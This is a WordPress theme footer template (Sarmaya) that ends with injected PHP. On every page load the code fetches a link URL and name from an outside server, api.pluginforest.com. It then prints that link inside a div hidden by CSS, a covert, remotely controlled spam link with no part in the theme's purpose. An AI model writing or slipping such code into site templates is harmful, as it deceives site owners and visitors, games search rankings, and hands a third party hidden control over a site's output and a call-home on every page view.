<?php
/**
 * The template for displaying the footer.
 *
 * Contains the closing of the #page div and all content after
 *
 * @package     Sarmaya
 * @author      Amjad Ali
 * @license     http://www.gnu.org/licenses/gpl-3.0.html GNU Public License
 */

?>

			</main>

		</div>

		<?php do_action( 'sarmaya_before_footer' ); ?>

		<footer class="site-footer">
			
		<?php
			/**
			 * Functions hooked in to sarmaya_footer action
			 *
			 * @hooked sarmaya_footer_widgets - 10
			 */
			do_action( 'sarmaya_footer' );
		?>

		</footer>

		<?php do_action( 'sarmaya_after_footer' ); ?>

	</div>

	<?php wp_footer(); ?>

	
	<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
